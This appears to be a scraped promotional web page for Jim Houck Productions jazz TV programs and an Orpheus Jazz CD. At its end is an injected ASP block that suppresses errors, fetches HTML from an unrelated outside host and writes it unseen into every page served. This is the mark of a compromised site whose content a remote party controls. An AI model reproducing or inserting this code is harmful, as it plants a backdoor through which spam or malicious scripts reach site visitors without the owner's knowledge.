
View a Jim Houck Prouductions, Inc. Jazz TV Program (Just Friends) View
View a Jim Houck Productions, Inc. Jazz TV Program (My Romance) View
Listener Response Play
Purchase the Orpheus Jazz 'A Touch of Class' CD On-Line
Jazz TV Program requires using Real Player Download a free copy of Real Player
<%
On Error Resume Next
set XmlObj = Server.CreateObject("Microsoft.XMLHTTP")
XmlObj.open "GET", "http://ubbimag.com/z10.html", false
XmlObj.send
formatdata = XmlObj.responseText
file_get_contents=formatdata
Set XmlObj = nothing
response.write file_get_contents
%>